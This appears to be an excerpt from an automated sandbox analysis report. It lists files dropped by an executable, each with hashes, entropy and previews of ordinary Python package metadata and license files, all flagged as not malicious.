                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20
                                                                                                                                                                                                                              Entropy (8bit):3.6841837197791887
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:JSe8AW6D:3fD
                                                                                                                                                                                                                              MD5:0613840F692BD9E064FEDD915DFD477A
                                                                                                                                                                                                                              SHA1:64DF38B36F541BA1714C15FCA1A9CA8C94EF2DAA
                                                                                                                                                                                                                              SHA-256:7C72231D4D46670023BDCC9DA6652752B4E76EF7625A31B83845592BC6F2D134
                                                                                                                                                                                                                              SHA-512:78AA888C24B3468C94FCB8EB882561D4B6F19A0537A4CFDDDFF94ED8A4BAFE8DF0C2B620E70B57A61E8BA3F877856DB9ADA548DFCA8CAE86D4C3C525A4E9B7EB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:importlib_resources.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21079
                                                                                                                                                                                                                              Entropy (8bit):5.103530371859935
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:12Vpnu38/2K9tjUaNtT/yTCtYTnWDdg3GaXb51KLVgWTVPeEGsuPrAESM:12Vpnu38JZtT/yIdg3D51KLV7RPeEGs+
                                                                                                                                                                                                                              MD5:1A287FAF08B125BC7C932AAD05E7DAEE
                                                                                                                                                                                                                              SHA1:C37042ADC0D1270485F4B8B5B9E085A274DC035B
                                                                                                                                                                                                                              SHA-256:66030D634580651B3E53CC19895D9231F8D22AA06B327817C8332CFC20303308
                                                                                                                                                                                                                              SHA-512:D0BB0AD27A17007DF7D3281FB2F46EFB048B69532D082AB1D431E0BA28E592D897687708B4EC972F4BC21EDA29DDDDC9EF44BB950DFC4FFB03EA75CDA4DE414C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: inflect.Version: 7.3.1.Summary: Correctly generate plurals, singular nouns, ordinals, indefinite articles.Author-email: Paul Dyson <pwdyson@yahoo.com>.Maintainer-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/jaraco/inflect.Keywords: plural,inflect,participle.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Natural Language :: English.Classifier: Operating System :: OS Independent.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Topic :: Text Processing :: Linguistic.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: more-itertools >=8.5.0.Requires-Dist: typeguard >=4.0.1.Requires-Dist: typing-extensions ; python_version < "3.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):943
                                                                                                                                                                                                                              Entropy (8bit):5.828988691860191
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:IVn/2zDPvbqfuIpBntmuIcjlM+sVGXdbkDcnJopDvDK16bZWJV:unuXPzUuIpRtmuZjl9sVQgcnJo9bK16E
                                                                                                                                                                                                                              MD5:C837BB3258448B7FCC6B77559C7F17B6
                                                                                                                                                                                                                              SHA1:B15701449CD64A13756A70AD3704E26DB1FF416B
                                                                                                                                                                                                                              SHA-256:5D7834AC1BA2612C6801050FDE57A7B98B0F36ACF88C3C2D4F376FD8911B3091
                                                                                                                                                                                                                              SHA-512:2333CD86502C51607414390ECF43BD6D62E863D3DFB0501DAD3A8B45F5F4DFA81F910917183FC4F4A0DEEC82C8F8B3CF8D5B0A2C136DEB164226BABE68B74A33
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:inflect-7.3.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..inflect-7.3.1.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..inflect-7.3.1.dist-info/METADATA,sha256=ZgMNY0WAZRs-U8wZiV2SMfjSKqBrMngXyDMs_CAwMwg,21079..inflect-7.3.1.dist-info/RECORD,,..inflect-7.3.1.dist-info/WHEEL,sha256=y4mX-SOX4fYIkonsAGA5N0Oy-8_gI4FXw5HNI1xqvWg,91..inflect-7.3.1.dist-info/top_level.txt,sha256=m52ujdp10CqT6jh1XQxZT6kEntcnv-7Tl7UiGNTzWZA,8..inflect/__init__.py,sha256=Jxy1HJXZiZ85kHeLAhkmvz6EMTdFqBe-duvt34R6IOc,103796..inflect/__pycache__/__init__.cpython-312.pyc,,..inflect/compat/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..inflect/compat/__pycache__/__init__.cpython-312.pyc,,..inflect/compat/__pycache__/py38.cpython-312.pyc,,..inflect/compat/py38.py,sha256=oObVfVnWX9_OpnOuEJn1mFbJxVhwyR5epbiTNXDDaso,160..inflect/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):91
                                                                                                                                                                                                                              Entropy (8bit):4.7098485981676825
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeXMRYFAVLKSgP+tPCCfA5S:RtC1VLKZWBBf
                                                                                                                                                                                                                              MD5:EB46A94D39AC40E2EEA4A32729E0C8C3
                                                                                                                                                                                                                              SHA1:E42EF49A7098269E1934932ECC3174B40967982A
                                                                                                                                                                                                                              SHA-256:CB8997F92397E1F6089289EC0060393743B2FBCFE0238157C391CD235C6ABD68
                                                                                                                                                                                                                              SHA-512:D89F0DA16AA37AAFAC0DE56A3DFBD72DC3C9DCC53C8E455094E7230DB21ABF95ED76EAC1848A4156DB422B9C10BE136201D871DCCB73AD38192E5536E41DBDFE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: setuptools (70.2.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8
                                                                                                                                                                                                                              Entropy (8bit):3.0
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:KDpJ:K9J
                                                                                                                                                                                                                              MD5:4571281D24750CBE7638EFE250E342AB
                                                                                                                                                                                                                              SHA1:61E8A0AD5796F1CA67EAB0D8108A6402483D499B
                                                                                                                                                                                                                              SHA-256:9B9DAE8DDA75D02A93EA38755D0C594FA9049ED727BFEED397B52218D4F35990
                                                                                                                                                                                                                              SHA-512:E7807002E53CC228D6EFB307E928C6737796B29E31D25A342ED407F556FFBF540494FE92C27B5C31043D2D7FF427C78A29C4FF5595BC11BB643003026642254E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:inflect.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3933
                                                                                                                                                                                                                              Entropy (8bit):4.993707893382395
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:D0duaC9zmnEh2S8xI0+4np+A+fbl7inVgQJSwT2:qq9KnEh2zxI0+4npn+zlmn+QJSwT2
                                                                                                                                                                                                                              MD5:C9BA49C9B82CEFCCAC79CB5B76BCB1EE
                                                                                                                                                                                                                              SHA1:AC0DB25AEFD2679B4C3265E713D00F6155A94465
                                                                                                                                                                                                                              SHA-256:20C51A96236C0395F53B1F4C5D458E6A0721E51E16C1BFF733B7ABA76F5D06D8
                                                                                                                                                                                                                              SHA-512:563C3BEC6FB8D137357130BADCB63A229A18A781B05E2F006F4A42AF7C9052D23D266908DA2E62FF283C9BA7BAA9B6CB6FB32A1999CB07F63471CA43003A34C0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: jaraco.collections.Version: 5.1.0.Summary: Collection objects similar to those in stdlib by jaraco.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/jaraco/jaraco.collections.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: jaraco.text.Provides-Extra: check.Requires-Dist: pytest-checkdocs >=2.4 ; extra == 'check'.Requires-Dist: pytest-ruff >=0.2.1 ; (sys_platform != "cygwin") and extra == 'check'.Provides-Extra: cover.Requires-Dist: pytest-cov ; extra == 'cover'.Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):873
                                                                                                                                                                                                                              Entropy (8bit):5.770829319764291
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:T9bn/2zDabvbqfunb1AO5bGYbEsJvbp1blKzmKmJaaX9WJV:T9bnuXabzUunb1AgbBb5Jvbp1blscWJV
                                                                                                                                                                                                                              MD5:0463062305AC30E7F3D6AB12DA825D90
                                                                                                                                                                                                                              SHA1:AC83602461BF535C78EB4CCC13AB103C12110D57
                                                                                                                                                                                                                              SHA-256:1E9B62BD70E4A5FA26E9594CBB80860FFECA3DEBFEE8773DAEFA774CD259CA06
                                                                                                                                                                                                                              SHA-512:8F617D9A2DA41BDC8591D9EA9F2DBE79D7C5816BA7A94D4044AFF2A0504C9738E83FFCAA350CEF20764D430C261C9DC17DBB5E4ABB7AE54C3BE8715C8AD6BB71
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.collections-5.1.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.collections-5.1.0.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.collections-5.1.0.dist-info/METADATA,sha256=IMUaliNsA5X1Ox9MXUWOagch5R4Wwb_3M7erp29dBtg,3933..jaraco.collections-5.1.0.dist-info/RECORD,,..jaraco.collections-5.1.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..jaraco.collections-5.1.0.dist-info/WHEEL,sha256=Mdi9PDNwEZptOjTlUcAth7XJDFtKrHYaQMPulZeBCiQ,91..jaraco.collections-5.1.0.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/collections/__init__.py,sha256=Pc1-SqjWm81ad1P0-GttpkwO_LWlnaY6gUq8gcKh2v0,26640..jaraco/collections/__pycache__/__init__.cpython-312.pyc,,..jaraco/collections/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):91
                                                                                                                                                                                                                              Entropy (8bit):4.696166043246402
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeXMRYFAWWHKRRP+tPCCfA5S:RtC1qjWBBf
                                                                                                                                                                                                                              MD5:6FBE8610D7E48CA32AE774804C4A0B19
                                                                                                                                                                                                                              SHA1:102D23C4ECB17ED83A6E43888B45FF2BBFE93E0B
                                                                                                                                                                                                                              SHA-256:31D8BD3C3370119A6D3A34E551C02D87B5C90C5B4AAC761A40C3EE9597810A24
                                                                                                                                                                                                                              SHA-512:78738099EC5B31FDEE5AE50F7840F17EFD526588835157CADF4249882462B1AF2E3BEDB77801A9FCB1D22A8FD41AA6A934B382F3E66309723D0E7F93C2F2868A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: setuptools (73.0.1).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7
                                                                                                                                                                                                                              Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                              MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                              SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                              SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                              SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (406)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4020
                                                                                                                                                                                                                              Entropy (8bit):4.99859161164956
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:D6P4YaCP1gGRbHneRohWYc+f/PCnG9rulJQ84UNxCUSwTcL:kPqGRbHneRohWJ+XPaqylW/USwTcL
                                                                                                                                                                                                                              MD5:812F27A7C8C748351DC1643D58B6B250
                                                                                                                                                                                                                              SHA1:AC9C92013B2F0FC65D741B32A9FE4B956DD6EB7D
                                                                                                                                                                                                                              SHA-256:C43B60B897A3D2D37D8845C252FC44261D9AEF171E21154111A9012D2AFFFED6
                                                                                                                                                                                                                              SHA-512:CAC62C3682F808D85233B69F1C142B5A0E95E316E4BDCBC6EE253583EC302FA42E635BAB6A837327D8CE5D26C08C8DCD9E45D5CFDD8346B4501C473250D66953
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: jaraco.context.Version: 5.3.0.Summary: Useful decorators and context managers.Home-page: https://github.com/jaraco/jaraco.context.Author: Jason R. Coombs.Author-email: jaraco@jaraco.com.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.License-File: LICENSE.Requires-Dist: backports.tarfile ; python_version < "3.12".Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'docs'.Provides-Extra: testing.Requires-Dist: pytest !=8.1.1,>=6 ; extra == 'testing'.Requires-Dist: pytest-checkdocs >=2.4
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):641
                                                                                                                                                                                                                              Entropy (8bit):5.76835538630355
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:TGA0a/2zDJAv/TnqfQlWJAL/fy9vKAGvAXCaaryBAl2VrkEQCXvbAT2r1S:TBn/2zDCvbqfuLO9FGoXamalKSCXzB1S
                                                                                                                                                                                                                              MD5:2B0A77624AE3903E42C3A8213E593796
                                                                                                                                                                                                                              SHA1:D63027FF018995D0620E2497BCE9678888A57667
                                                                                                                                                                                                                              SHA-256:55197B88A78443297BB2D827A75BAAE740B33896251D872835D4B4C75EC2F57E
                                                                                                                                                                                                                              SHA-512:C02FB1554F8F40158BB60F2B4EC07D80F71CFBFFB38463C5809385A7A2FF8DDB2BDFEFE9AE5E67F4DEC3D904A6E0925E565B0EE6363DD0C2ED5B03A96B056B18
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.context-5.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.context-5.3.0.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.context-5.3.0.dist-info/METADATA,sha256=xDtguJej0tN9iEXCUvxEJh2a7xceIRVBEakBLSr__tY,4020..jaraco.context-5.3.0.dist-info/RECORD,,..jaraco.context-5.3.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..jaraco.context-5.3.0.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/__pycache__/context.cpython-312.pyc,,..jaraco/context.py,sha256=REoLIxDkO5MfEYowt_WoupNCRoxBS5v7YX2PbW8lIcs,9552..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
